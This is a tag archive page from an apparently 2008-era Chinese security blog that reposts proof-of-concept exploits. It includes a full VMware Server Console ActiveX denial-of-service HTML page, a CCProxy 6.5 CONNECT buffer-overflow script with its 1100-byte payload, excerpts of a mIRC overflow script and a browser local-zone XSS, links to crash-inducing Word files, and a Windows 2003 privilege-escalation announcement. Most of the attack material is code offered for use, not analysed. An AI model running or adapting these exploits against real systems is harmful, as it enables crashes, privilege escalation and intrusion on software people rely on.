标签： PoC | 第2页 | 鬼仔's Blog鬼仔's Blog

It has been a long time since Token Kidnapping presentation (http://www.argeniss.com/research/TokenKidnapping.pdf)
was published so I decided to release a PoC exploit for Win2k3 that alows to execute code under SYSTEM account.
阅读全文 »

Tags: Exploit, PoC, Token Kidnapping, Windows 2003, 提权

mIRC 6.34 Remote Buffer Overflow PoC

2008/10/03 18:27 | 鬼仔 | 技术文章 | 消灭0回复

########################################################
# Mirc 6.34 Remote Buffer Overflow
#
# This poc allow you to own the 2 first EDI & EDX bytes.
#
# To become remote, add a simple document.location.href=irc://server.com/… in some html page
#
use IO::Socket;
阅读全文 »

Tags: mIRC, PoC

CCproxy 6.5 Connect BufferOverflow POC

2008/10/01 15:57 | 鬼仔 | 工具收集 | 消灭0回复

作者：Friddy

#Author:Friddy
#QQ:568623
#Email:[email protected]
import sys
import struct
import socket
from time import sleep
prinf “CCproxy 6.5 Connect BufferOverflow POC\nResult:Crash\n”
buf=(“CONNECT “+”A”*1100+”:443 HTTP/1.0\n”
“User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) ; .NET CLR 2.0.50727)\n”
“Host: www.friddy.cn\n”
“Content-Length: 0\n”
“Proxy-Connection: Keep-Alive\n”
“Pragma: no-cache\x0d\x0a\x0d\x0a”)
阅读全文 »

Tags: CCProxy, PoC

世界之窗等浏览器本地xss跨域漏洞POC

2008/06/28 14:44 | 鬼仔 | 技术文章 | 消灭0回复

漏洞说明：http://www.80sec.com/360-sec-browser-localzone-xss.html
文档来源:http://www.80sec.com/release/The-world-browser-locale-zone-xss-POC.txt

漏洞分析：世界之窗浏览器在起始页面是以res://E:\PROGRA~1\THEWOR~1.0\languages\chs.dll /TWHOME.HTM的形式来处理的,而由于缺乏对res协议安全的必要控制,导致页面的权限很高,而该页面中存在的一个xss问题将导致本地跨域漏洞，简单分析如下：

<script language="JavaScript">
var nOldCount = 0;
for( i = 0; i < g_nCountOld; i ++ )
{
str_url = g_arr_argUrlOld[i];
str_name = g_arr_argNameOld[i];

阅读全文 »

Tags: PoC, XSS, 世界之窗

Word 0day POC发布了

2008/06/28 14:39 | 鬼仔 | 工具收集 | 消灭0回复

来源:Sowhat的blog

Microsoft Word Bulleted List Handling Remote Memory Corruption Vulnerability

http://www.securityfocus.com/data/vulnerabilities/exploits/crash-word-1.doc
http://www.securityfocus.com/data/vulnerabilities/exploits/crash-word-2.doc
http://www.securityfocus.com/data/vulnerabilities/exploits/crash-word-3.doc
http://www.securityfocus.com/data/vulnerabilities/exploits/crash-word-4.doc

或者统一打包 http://packetstormsecurity.org/0806-exploits/msword-crash.tgz

Tags: Office Word, PoC

VMware Server Console ActiveX DOS POC

2008/05/29 14:37 | 鬼仔 | 工具收集 | 2 个回复

<html>
<title>VMware Server Console ActiveX DOS POC</title>
<!--
Author:Shennan Wang
blog:http://hi.baidu.com/nansec
stuff:http://www.d4rkn3t.cn
thanks:
Robinh00d,ayarei,void
-->
<head>
<script language="JavaScript">
    function test() {
var bufA = "2";
var bufB = "0";
var bufC = "0";
var bufD = "8";
for (i = 0; i < 2008; i++) { 
bufA += bufA;}
for (i = 0; i < 2008; i++){
bufB += bufB;}
for (i = 0; i < 2008; i++){
bufC += bufC;}
for (i = 0; i < 2008; i++){
bufD += bufD;}  
nansec.DoModalDirect(bufA,bufB,bufC,bufD);}
</script>
</head>
 <body onload="JavaScript: return test();">
<object classid="clsid:D2C53A29-B43A-4367-B808-52CE785BBF36" id="nansec">
</object>
 </body>
</html>

# milw0rm.com [2008-05-28]

Tags: Activex, PoC, VMware

鬼仔's Blog

标签 ‘PoC’ 下的日志

MS08-066 AFD.sys Local Privilege Escalation Exploit (POC)

MS Windows InternalOpenColorProfile Heap Overflow PoC (MS08-046)

MS Windows 2003 Token Kidnapping Local Exploit PoC

mIRC 6.34 Remote Buffer Overflow PoC

CCproxy 6.5 Connect BufferOverflow POC

世界之窗等浏览器本地xss跨域漏洞POC

Word 0day POC发布了

VMware Server Console ActiveX DOS POC

分类

最新日志

最新评论